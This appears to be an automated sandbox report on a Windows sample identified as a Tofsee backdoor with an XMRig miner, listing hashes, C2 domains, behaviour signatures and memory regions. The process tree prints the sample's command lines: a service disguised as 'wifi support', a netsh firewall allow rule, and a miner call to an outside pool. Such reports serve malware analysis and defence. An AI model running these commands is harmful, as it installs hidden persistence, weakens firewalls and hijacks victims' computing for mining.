Analysis

  • max time kernel
    148s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    04-06-2022 17:58

General

  • Target

    239fd930694473af362be2dc3f69356a93c407664fcf775e83e2a7f98eccc0ab.exe

  • Size

    199KB

  • MD5

    dbb320cd3332f6da387c08cc81c6e0d0

  • SHA1

    253d3870fc47543eba68c12d22203d772686de7f

  • SHA256

    239fd930694473af362be2dc3f69356a93c407664fcf775e83e2a7f98eccc0ab

  • SHA512

    64fb6410897616f1ba222ddc69c6a72ea815ce4f4833f536aafa6546f5c40f5ed1378a9a4c7ebbc02c581116e11ac959a7d72bf530e1d082547fbf1b63835c06

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\239fd930694473af362be2dc3f69356a93c407664fcf775e83e2a7f98eccc0ab.exe
    "C:\Users\Admin\AppData\Local\Temp\239fd930694473af362be2dc3f69356a93c407664fcf775e83e2a7f98eccc0ab.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2608
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ebdyqypx\
      2⤵
        PID:4804
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hufkjghu.exe" C:\Windows\SysWOW64\ebdyqypx\
        2⤵
          PID:5024
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create ebdyqypx binPath= "C:\Windows\SysWOW64\ebdyqypx\hufkjghu.exe /d\"C:\Users\Admin\AppData\Local\Temp\239fd930694473af362be2dc3f69356a93c407664fcf775e83e2a7f98eccc0ab.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4244
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description ebdyqypx "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:1144
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start ebdyqypx
          2⤵
          • Launches sc.exe
          PID:5092
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:3636
      • C:\Windows\SysWOW64\ebdyqypx\hufkjghu.exe
        C:\Windows\SysWOW64\ebdyqypx\hufkjghu.exe /d"C:\Users\Admin\AppData\Local\Temp\239fd930694473af362be2dc3f69356a93c407664fcf775e83e2a7f98eccc0ab.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4168
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Windows security bypass
          • Sets service image path in registry
          • Deletes itself
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:200
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4700

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\hufkjghu.exe
        Filesize

        13.6MB

        MD5

        6d097949c6a80df017dd289276ad3ebf

        SHA1

        cbeb25c35493dc80cc84c886f557ee5b39c6866b

        SHA256

        f5b890721c550b8812a1568dd3a65e24473ff3605a663d155a644216495d9ee8

        SHA512

        b70bf45510200114d7adcc3314c984667197552a65cf5e65fa19a1d28fea22d1ce6242be09587a8798f4abccdbea323b41bb1b6a4fb273555c92d1f413f68b0e

      • C:\Windows\SysWOW64\ebdyqypx\hufkjghu.exe
        Filesize

        13.6MB

        MD5

        6d097949c6a80df017dd289276ad3ebf

        SHA1

        cbeb25c35493dc80cc84c886f557ee5b39c6866b

        SHA256

        f5b890721c550b8812a1568dd3a65e24473ff3605a663d155a644216495d9ee8

        SHA512

        b70bf45510200114d7adcc3314c984667197552a65cf5e65fa19a1d28fea22d1ce6242be09587a8798f4abccdbea323b41bb1b6a4fb273555c92d1f413f68b0e

      • memory/200-489-0x0000000002C40000-0x0000000002C55000-memory.dmp
        Filesize

        84KB

      • memory/200-487-0x0000000002C40000-0x0000000002C55000-memory.dmp
        Filesize

        84KB

      • memory/200-435-0x0000000002C49A6B-mapping.dmp
      • memory/1144-189-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/1144-187-0x0000000000000000-mapping.dmp
      • memory/2608-160-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-150-0x0000000000A20000-0x0000000000B6A000-memory.dmp
        Filesize

        1.3MB

      • memory/2608-127-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-128-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-129-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-130-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-131-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-133-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-134-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-135-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-136-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-137-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-138-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-139-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-140-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-132-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-141-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-142-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-143-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-144-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-145-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-146-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-147-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-148-0x0000000000B6C000-0x0000000000B7A000-memory.dmp
        Filesize

        56KB

      • memory/2608-149-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-165-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-151-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-152-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-153-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-154-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-155-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-156-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-157-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-158-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-159-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-118-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-161-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-162-0x0000000000400000-0x00000000008FB000-memory.dmp
        Filesize

        5.0MB

      • memory/2608-120-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-119-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-126-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-166-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-167-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-168-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-163-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-121-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-122-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-219-0x0000000000400000-0x00000000008FB000-memory.dmp
        Filesize

        5.0MB

      • memory/2608-214-0x0000000000B6C000-0x0000000000B7A000-memory.dmp
        Filesize

        56KB

      • memory/2608-164-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-123-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-124-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/2608-125-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/3636-210-0x0000000000000000-mapping.dmp
      • memory/4168-438-0x00000000011A0000-0x00000000011B3000-memory.dmp
        Filesize

        76KB

      • memory/4168-488-0x0000000000400000-0x00000000008FB000-memory.dmp
        Filesize

        5.0MB

      • memory/4168-441-0x0000000000400000-0x00000000008FB000-memory.dmp
        Filesize

        5.0MB

      • memory/4244-185-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4244-180-0x0000000000000000-mapping.dmp
      • memory/4244-182-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4244-183-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4244-184-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4244-188-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4700-524-0x000000000238259C-mapping.dmp
      • memory/4804-170-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4804-172-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4804-179-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4804-169-0x0000000000000000-mapping.dmp
      • memory/4804-171-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/4804-173-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/5024-181-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/5024-178-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/5024-174-0x0000000000000000-mapping.dmp
      • memory/5024-177-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/5024-175-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/5024-176-0x0000000077520000-0x00000000776AE000-memory.dmp
        Filesize

        1.6MB

      • memory/5092-198-0x0000000000000000-mapping.dmp